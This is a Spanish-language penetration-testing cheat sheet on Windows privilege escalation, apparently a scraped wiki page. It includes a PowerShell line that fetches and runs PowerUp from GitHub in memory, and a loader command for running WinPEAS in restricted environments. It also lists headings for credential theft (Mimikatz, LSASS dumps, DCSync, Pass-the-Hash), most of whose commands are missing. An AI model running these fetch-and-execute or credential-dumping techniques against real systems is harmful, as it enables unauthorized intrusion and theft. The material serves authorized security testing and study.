Windows

Enumeración automatizada

WinPEAS

https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS

Última versión y binarios: https://github.com/peass-ng/PEASS-ng/releases

iwr https://github.com/peass-ng/PEASS-ng/releases/download/20241007-05f777b2/winPEASx64.exe -outputfile winpeas64.exe

Otras formas de transferir ficheros: Misc

Ejecución básica:

.\winPEASx64.exe

Para entornos más restringidos, se puede usar un loader que permita cargar y ejecutar en memoria el programa. Por ejemplo:

Windows

.\sloader.exe -f C:\Pentest\Tools\winPEASx64.exe -p notcolor log

PowerUp

https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1

. C:\AD\Tools\PowerUp.ps1

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)

Se enumeran las posibles vías de elevación de privilegios y se exporta la información a un fichero html:

PrivescCheck

https://github.com/itm4n/PrivescCheck

Vulnerabilidades

Actualizaciones vía WSUS

WSUS (Windows Server Update Services) es un servicio que permite gestionar la distribución de actualizaciones en redes corporativas con sistemas Windows.

Es un servidor centralizado que descarga y distribuye parches de seguridad y actualizaciones en los clientes de la red local.

Para comprobar si el servidor WSUS es vulnerable a CVE-2020-1013, se tienen que dar dos condiciones:

1. El servidor WSUS tiene que utilizar el protocolo HTTP en vez de HTTPS. Para comprobar cuál servidor WSUS se está utilizando:

1. Que el uso del servidor WSUS esté activado. Para ello, el resultado del siguiente registro debe ser igual a 0:

Writeup de la investigación y presentación en la BlackHat:

• Presentación: https://www.blackhat.com/docs/us-15/materials/us-15-Stone-WSUSpect-Compromising-Windows-Enterprise-Via-Windows-Update.pdf

• Investigación: https://www.blackhat.com/docs/us-15/materials/us-15-Stone-WSUSpect-Compromising-Windows-Enterprise-Via-Windows-Update-wp.pdf

Otras referencias:

• https://gosecure.ai/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/

• https://learn.microsoft.com/es-es/windows-server/administration/windows-server-update-services/get-started/windows-server-update-services-wsus

• https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus:~:text=ft%20Name%2CRoot-,WSUS,-You%20can%20compromise

Escalada de privilegios

Equipo conectado con Azure

Otras formas de transferir ficheros: Misc

Servicio modificable

Identificación

Ejemplo de explotación

Máquinas del dominio con acceso privilegiado

Buscar máquinas donde el usuario tiene permisos de administrador local:

• winrs:

• PSSession:

Extracción de credenciales

Obtención de SAM, SYSTEM, SECURITY

GPP - Group Password Policy

Mimikatz

Dump LSASS

Seckurlsa

Kerberos

DSync

Vault

Terminal Services

Pass-the-Hash

Credenciales en eventos de logs

Se parsean los logs de Windows Event ID 4688 para extraer credenciales:

Referencias

• WADComs - https://wadcoms.github.io/#+Privilege%20Escalation

• Track 3 15 Goodbye Obfuscation Hello Invisi Shell Hiding Your Powershell Script in Plain Sight Omer - https://www.youtube.com/watch?v=Y3oMEiySxcc

• https://www.atomicredteam.io/atomic-red-team

• https://etchedshell.medium.com/powerup-experience-42f3d7904e79